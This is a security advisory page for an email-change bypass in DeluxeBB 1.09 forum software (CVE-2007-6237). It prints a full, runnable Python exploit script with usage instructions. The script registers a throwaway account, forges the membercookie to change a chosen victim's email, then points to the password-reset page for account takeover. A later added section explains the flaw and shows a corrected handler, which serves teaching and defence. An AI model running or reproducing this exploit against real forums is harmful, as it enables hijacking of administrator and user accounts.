SecurityReason.com - Our Reason is Security


Topic : DeluxeBB E-Mail Address Change Security Bypass


SecurityAlert : 3416
CVE : CVE-2007-6237
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : Nexen
Published : 04.12.2007

Affected Software : DeluxeBB 1.09



Advisory Content :

http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=21

###################################################

DeluxeBB E-Mail Address Change Security Bypass

Credits: Nexen

Application: DeluxeBB

Version: 1.09

Impact: Security Bypass

Risk: [3/5]

Exploit:

#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
# Python 2 script: uses the httplib, urllib and md5 modules.
'''
------------------------------------------------------------------------------------------------
§ DeluxeBB 0day Remote Change Admin's credentials §
------------------------------------------------------------------------------------------------
nexen
------------------------------------------------------------------------------------------------

PoC / Bug Explanation:

When you update your profile, DeluxeBB executes a vulnerable query:

$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");

The row to update is selected by the "membercookie" cookie (a username), which is
never checked against the memberid/memberpw cookies that authenticate the session.
So, by editing the cookie "membercookie", you can change a remote user's email.

Enjoy ;)

------------------------------------------------------------------------------------------------
'''

import httplib, urllib, sys, md5
from random import randint

print "\n########################################################################################"
print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "
print " "
print " Vulnerability Discovered By Nexen "
print " Greetz to The:Paradox that Coded the Exploit. "
print " "
print " Usage: "
print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])
print " "
print " Additional Flags: "
print " -id34 -passMypassword -port80 "
print " "
print " Example: "
print " python %s 127.0.0.1 admin /DeluxeBB/ me@it.com -port81 " % (sys.argv[0])
print " "
print "########################################################################################\n"

if len(sys.argv) <= 4:
    sys.exit()
else:
    print "[.]Exploit Starting."

target = sys.argv[1]        # forum host
admin_nick = sys.argv[2]    # victim's username (sent in the membercookie cookie)
path = sys.argv[3]          # web path of the DeluxeBB install, e.g. /DeluxeBB/
real_email = sys.argv[4]    # address the victim's account is switched to
botpass = "the-new-administrator"   # password of the throwaway account registered below
rand = randint(1, 99999)

# Optional flags: -id<uid> and -pass<password> reuse an existing account instead of
# registering a new one; -port<n> selects the HTTP port (default 80).
dn1 = 0
dn2 = 0
dn3 = 0
try:
    for line in sys.argv[:]:
        if line.find('-pass') != -1 and dn1 == 0:
            upass = line.split('-pass')[1]
            dn1 = 1
        elif line.find('-pass') == -1 and dn1 == 0:
            upass = ""
        if line.find('-id') != -1 and dn2 == 0:
            userid = line.split('-id')[1]
            dn2 = 1
        elif line.find('-id') == -1 and dn2 == 0:
            userid = ""
        if line.find('-port') != -1 and dn3 == 0:
            port = int(line.split('-port')[1])
            dn3 = 1
        elif line.find('-port') == -1 and dn3 == 0:
            port = 80
except:
    sys.exit("[-]Some error in Additional Flag.")

if upass == "" and userid != "" or userid == "" and upass != "":
    print "[-]Bad Additional flags -id -pass given, ignoring them."
    upass = ""
    userid = ""

# Trying to connect.
try:
    conn = httplib.HTTPConnection(target, port)
    conn.request("GET", "/")
except:
    sys.exit("[-]Cannot connect. Check Target.")

# Registering a new user if id or upass not defined.
try:
    conn = httplib.HTTPConnection(target, port)
    if upass == "" or userid == "":
        conn.request("POST", path + "misc.php?sub=register",
                     urllib.urlencode({'submit': 'Register',
                                       'name': 'th331337.%d' % (rand),
                                       'pass': botpass, 'pass2': botpass,
                                       'email': 'root%d@yoursystemgotpowned.it' % (rand)}),
                     {"Accept": "text/plain",
                      "Content-type": "application/x-www-form-urlencoded"})
        response = conn.getresponse()
        cookies = response.getheader('set-cookie').split(";")
        #print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)
        print "[.]Registering a new user. -->", response.status, response.reason
        conn.close()

        # Getting memberid in Cookies
        for line in cookies[:]:
            if line.find('memberid') != -1:
                mid = line.split('memberid=')[1]

        # Isset like starts
        try:
            mid
        except NameError:
            sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. "
                     "If you have not done yet, you may have to register manually "
                     "and use flags -id -pass")
except AttributeError:
    sys.exit("[-]AttributeError Check your Target/path.")

# Doing some Md5: the memberpw cookie is sent as the md5 of the password.
if upass == "" or userid == "":
    hash = md5.new()
    hash.update(botpass)
    passmd5 = hash.hexdigest()
else:
    hash = md5.new()
    hash.update(upass)
    passmd5 = hash.hexdigest()
    mid = userid

# Updating "victim" email in Profile: memberid/memberpw are our own credentials,
# membercookie is the victim's username.
conn = httplib.HTTPConnection(target, port)
conn.request("POST", path + "cp.php?sub=settings",
             urllib.urlencode({'submit': 'Update', 'xemail': real_email}),
             {"Accept": "text/plain",
              "Cookie": "memberid=" + mid + "; membercookie=" + admin_nick + ";memberpw=" + passmd5 + ";",
              "Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Changing \"" + admin_nick + "\" Email With \"" + real_email + "\" -->", response.status, response.reason
conn.close()

print "[+]All Done! Email changed!!!\n\n You can reset \"" + admin_nick + "\" password here -> " + target + path + "misc.php?sub=lostpw :D\n\n Have Fun =)\n"

Solution: No solution available. Write to the administrator to add this information.
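To make concrete what the membercookie/memberid mismatch in the advisory amounts to, and what a corrected handler looks like, here is an added example written for this page. It is not DeluxeBB code (DeluxeBB is PHP) and not a vendor patch. It models the profile update against an in-memory sqlite3 users table filled with constructed rows, and it assumes, as the exploit's cookie set implies but the page does not show, that the session is authenticated by matching the memberid and memberpw cookies against the users table and that memberpw is the md5 hex digest of the password. The vulnerable handler keeps the advisory's query shape, selecting the row by the unverified membercookie username; the fixed handler keys the UPDATE on the uid that actually authenticated. Both use bound parameters so the demo is safe to run, whereas the original query interpolated the values into the SQL string.

```python
"""Model of the DeluxeBB 1.09 e-mail change bypass (CVE-2007-6237) and a fix.

Added example, not DeluxeBB code. The session check below is an assumption
modelled after what the exploit sends: memberid + memberpw (md5 of password)
identify the logged-in user; membercookie carries a username.
"""
import hashlib
import sqlite3


def md5hex(text):
    """memberpw cookie value as the exploit builds it: md5 hex digest of the password."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_db():
    """In-memory users table with constructed sample rows (not real forum data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT UNIQUE, "
               "password TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", md5hex("admin-secret"), "admin@forum.example"),
        # the throwaway account the exploit registers for itself
        (2, "th331337.4242", md5hex("the-new-administrator"), "root4242@yoursystemgotpowned.it"),
    ])
    return db


def authenticate(db, cookies):
    """Return the uid whose memberid/memberpw cookies match, else None (assumed session model)."""
    try:
        uid = int(cookies.get("memberid", ""))
    except ValueError:
        return None
    row = db.execute("SELECT uid FROM users WHERE uid = ? AND password = ?",
                     (uid, cookies.get("memberpw", ""))).fetchone()
    return row[0] if row else None


def update_email_vulnerable(db, cookies, xemail):
    """Shape of the DeluxeBB 1.09 query: the row is chosen by the membercookie
    username, which is never tied to the uid that just authenticated."""
    if authenticate(db, cookies) is None:
        return False
    # bound parameters here for safety; the original built the SQL by string interpolation
    db.execute("UPDATE users SET email = ? WHERE username = ?",
               (xemail, cookies.get("membercookie", "")))
    return True


def update_email_fixed(db, cookies, xemail):
    """Hardened form: update only the row of the identity that authenticated."""
    uid = authenticate(db, cookies)
    if uid is None:
        return False
    db.execute("UPDATE users SET email = ? WHERE uid = ?", (xemail, uid))
    return True


def email_of(db, username):
    return db.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()[0]


def run_demo():
    """Replay the exploit's cookie set against both handlers.

    Returns {"vulnerable": (admin_email, attacker_email), "fixed": (...)}.
    """
    results = {}
    for name, handler in (("vulnerable", update_email_vulnerable),
                          ("fixed", update_email_fixed)):
        db = make_db()
        # exactly what the exploit sends: own memberid/memberpw, victim's nick in membercookie
        attacker_cookies = {"memberid": "2",
                            "membercookie": "admin",
                            "memberpw": md5hex("the-new-administrator")}
        handler(db, attacker_cookies, "attacker@evil.example")
        results[name] = (email_of(db, "admin"), email_of(db, "th331337.4242"))
    return results


if __name__ == "__main__":
    for name, (admin_mail, attacker_mail) in run_demo().items():
        print("%-10s admin=%s attacker=%s" % (name, admin_mail, attacker_mail))
```

Run it and the vulnerable handler rewrites the admin's address while the attacker's own row is untouched, which is the precondition for the lost-password step the exploit points at; the fixed handler changes only the attacker's own row. The design point is that every cookie except the pair that was verified is attacker-controlled input, so the WHERE clause of a profile update must be derived from the verified identity, never from a separate cookie that merely looks like one.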






Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.

Copyright © SecurityReason.com. All Rights Reserved.